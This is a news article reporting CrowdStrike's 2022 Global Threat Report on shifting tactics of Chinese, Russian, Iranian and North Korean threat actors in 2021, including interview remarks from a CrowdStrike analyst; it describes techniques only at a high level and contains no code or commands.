How Chinese, Russian Threat Actors Changed Tactics in 2021Cybersecurity Firm Analyzes Fresh Focus Areas, Activities of Adversaries
In 2021, there was a spike in cybercrime, from the exploitation of Log4j vulnerabilities to the increasing popularity of malware-free cyberattacks. The focus and tactics used by global threat actors also changed, according to cybersecurity company CrowdStrike.
Analyzing the workings of Chinese and Russian threat actors, the 2022 Global Threat Report says that while the Chinese, who are well known for their track record in vulnerability exploitation, weaponized vulnerabilities at scale to facilitate initial access, the Russians primarily targeted IT and cloud service providers in 2021.
China's Evolving Capabilities
Chinese threat actors that CrowdStrike calls PANDA have been deploying exploits for new vulnerabilities at a "significantly elevated rate," according to the report (see: Report: China to Target Encrypted Data as Quantum Advances)
The threat actors exploited 12 new vulnerabilities affecting nine different products in 2021. The company did not specify the vulnerabilities or the affected products and the extent of the damage could not be immediately ascertained.
Analyzing the shift in exploitation methods, CrowdStrike's report shows that previously, Chinese threat actors relied on exploits that required user interaction, such as opening malicious documents and attachments in email, or visiting websites hosting malicious code. But in 2021, the Chinese adversaries exploited vulnerabilities in internet-facing devices or services. According to CrowdStrike's data, there has been an 83.3% increase in Chinese threat actors exploiting published vulnerabilities. The number rose from just two in 2020 to 12 in 2021.
China has always been, and will likely continue to be, a major player among nation-state adversaries, Scott Jarkoff, director of the strategic threat advisory group at CrowdStrike, tells Information Security Media Group.
He attributes the success of Chinese threat actors to the country building its own domestic capabilities. "To do that, they are - and have been for many years now - conducting operations to steal intellectual property. And I don't foresee that changing in the near future," Jarkoff says.
He says China is the adversary that is most widely targeting specific vulnerabilities as a way of conducting its attacks.
The U.S.-China Economic and Security Review Commission on Thursday addressed Chinese cybercrime groups' prowess in exploiting vulnerabilities as a cyberwarfare tactic. In its report on China’s cyber capabilities, the joint session, including Chinese and American experts, highlighted how the country's robust vulnerability research ecosystem was a strategic advantage.
While adversaries from other countries use credentials purchased from underground criminal forums for initial access, Jarkoff says Chinese threat actors exploit public-facing sites that allow them to access a targeted network.
The Chinese threat groups that CrowdStrike tracks are mostly after intellectual property in a particular company, he says, as opposed to Russian groups that target critical infrastructure.
But although Chinese adversaries are primarily focused on stealing intellectual property - organizational R&D data or foreign intelligence - they are also known to target critical infrastructure industries, Jarkoff says.
"We see Chinese adversaries focusing on the telecom industry as it has a lot of data, and it's also a great way to conduct surveillance and carry out intelligence collection."
An article in The Diplomat shows how China's legal system facilitates intellectual property theft as the country's IP laws and corruption in the courts make IP prosecution "nearly impossible."
Russian Threat Actors and the REvil Takedown
Russian threat actors target critical infrastructure as a show of force to demonstrate their capabilities, Jarkoff says, as in the 2016 attack on Ukrainian power grids, which affected around 1.4 million Ukrainian citizens. Chinese adversaries, on the other hand, lay low to focus on surveillance and data theft, he says.
According to CrowdStrike's report, Fancy Bear, a prominent Russian threat group, is associated with the country's Main Intelligence Directorate - or GRU. Following the U.S. Department of Justice's 2018 report of GRU officials working with international hacking and disinformation operations, the group has decreased its use of malware and switched to credential-harvesting tactics, the report says.
Another prominent Russian threat group, Cozy Bear, proved its post-exploitation proficiency prowess through lateral movement within cloud environments, the CrowdStrike report says. The group uses authentication cookie theft to bypass multifactor authentication restrictions.
Russian threat group REvil has been on a roller coaster ride. In January 2022, the Federal Security Service of the Russian Federation said it had arrested 14 cybercriminals associated with the ransomware group and had seized more than $600,000 and 500,000 euros in cryptocurrency assets.
Jarkoff says of the arrests: "There is always going to be a sacrificial lamb, and it might be that the REvil ransomware group is that sacrificial lamb."
"My assessment is that it's likely those guys aren't sitting in jail somewhere in Russia. Chances are they're probably employed by the FSB. They might be conducting ransomware operations even now. [It's] just that they've been taken off the streets."
He predicts that members of the disbanded REvil group may be working for one of the Bear groups, or potentially even become a new Bear group. CrowdStrike refers to Russian threat actors as Bears (see: Suspected REvil Ransomware Spinoff 'Ransom Cartel' Debuts).
The CrowdStrike report also mentions the shift in focus for threat actors from other countries.
Iran has begun leveraging ransomware to blend disruptive operations with e-crime activities, the report says. Iran-linked adversaries have adopted the use of ransomware in addition to "lock-and-leak" disruptive information operations to target organizations in the U.S., Israel, the Middle East and North Africa, according to CrowdStrike.
And the Democratic People's Republic of Korea has turned to cryptocurrency-related activities to compensate for revenue lost as a result of the pandemic, the report says. The North Korean Chollima and Crane threat groups are included in CrowdStrike's list of nation-state adversaries.
CrowdStrike has also identified 21 newly named adversaries in its latest threat report, taking the total number of threat actors it tracks to more than 170. The new members on the list include "private sector offensive actors" - Israeli spyware makers the NSO Group and Candiru. The threat actors added to the list are Turkey-based Wolf, Colombia-based Ocelots, and Prophet Spider, which is of unknown origin.
While CrowdStrike did not offer additional details on Wolf and Ocelots, it says the Prophet Spider threat group leverages Log4j exploits for credential harvesting and has already attempted this approach on an undisclosed cloud workspace service.
Jarkoff says the group uses the Log4j exploit to gain access into networks, and "it has been pretty successful for them." The group has previously attacked Oracle WebLogic to gain access to user environments.
The e-crime group, active since May 2017, has not been linked to any particular country so far.
While Jarkoff says that several other adversaries have also leveraged Log4j for their activities, "it's not to the same degree and velocity today as it was two months ago."